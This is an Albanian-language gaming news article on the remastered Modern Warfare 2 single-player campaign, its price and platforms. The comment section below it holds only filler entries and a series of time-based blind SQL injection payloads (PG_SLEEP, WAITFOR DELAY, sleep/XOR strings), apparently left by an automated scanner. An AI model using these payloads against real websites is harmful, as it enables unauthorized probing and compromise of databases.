Call of Duty: Modern Warfare 2 është rimasterizuar dhe është disponibël tani!

Pas shumë spekulimesh, një version i rimasterizuar i “Call of Duty: Modern Warfare 2 single-player campaign” është më në fund këtu, duke sjellë një version të përmirësuar të një prej lojërave më ikonike të FPS të fundvitit 2000 në një harduer modern.

Versioni i përmirësuar i Modern Warfare 2 përfshin vetëm “single-player campaign”. Versioni i rimasterizuar shton vizuale me cilësi të lartë dhe përmirësime audio në tregimin origjinal nga viti 2009, sipas një postimi në blog nga Activision. Loja është e disponueshme tashmë në mënyrë dixhitale në PS4, PC dhe Xbox One për 19,99 dollarë, ndërkohë “pre-orders” momentalisht nuk janë të disponueshme për momentin.

 

“CALL OF DUTY: WARFARE MODERN 2” është lançuar fillimisht në nëntor 2009”

 Pronarët e PS4 që blejnë “Modern Warfare 2 remastered” - e cila, duhet të theksohet, nuk është vazhdim i Call of Duty: Modern Warfare - gjithashtu do të marrin “in-game items” si në lojën e 2019 ashtu edhe në spinoffin e royale battle Warzone, e cila nisi në fillim të këtij muaji. Disa artikuj të paraqitur në pako përfshijnë “new caracter-skin” gjithashtu edhe disa projekte armësh, të cilat ju japin akses per të marrë armë më të forta pa pasur nevojë t'i fitoni ato përmes përparimit.

 

89 komente

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

1

1

555

v1IqHDCL' OR 384=(SELECT 384 FROM PG_SLEEP(12))--

v1IqHDCL' OR 384=(SELECT 384 FROM PG_SLEEP(12))--

555

-1)) OR 91=(SELECT 91 FROM PG_SLEEP(12))--

-1)) OR 91=(SELECT 91 FROM PG_SLEEP(12))--

555

-5) OR 141=(SELECT 141 FROM PG_SLEEP(12))--

-5) OR 141=(SELECT 141 FROM PG_SLEEP(12))--

555

-5 OR 95=(SELECT 95 FROM PG_SLEEP(12))--

-5 OR 95=(SELECT 95 FROM PG_SLEEP(12))--

555

V3w2ZU5x'; waitfor delay '0:0:12' --

V3w2ZU5x'; waitfor delay '0:0:12' --

555

1 waitfor delay '0:0:12' --

1 waitfor delay '0:0:12' --

555

-1); waitfor delay '0:0:12' --

-1); waitfor delay '0:0:12' --

555

-1; waitfor delay '0:0:12' --

-1; waitfor delay '0:0:12' --

555

(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/

(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/

555

0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z

0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z

555

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z

555

Posto një koment

Produkte të përzgjedhura

include usage is not allowed in this context include usage is not allowed in this context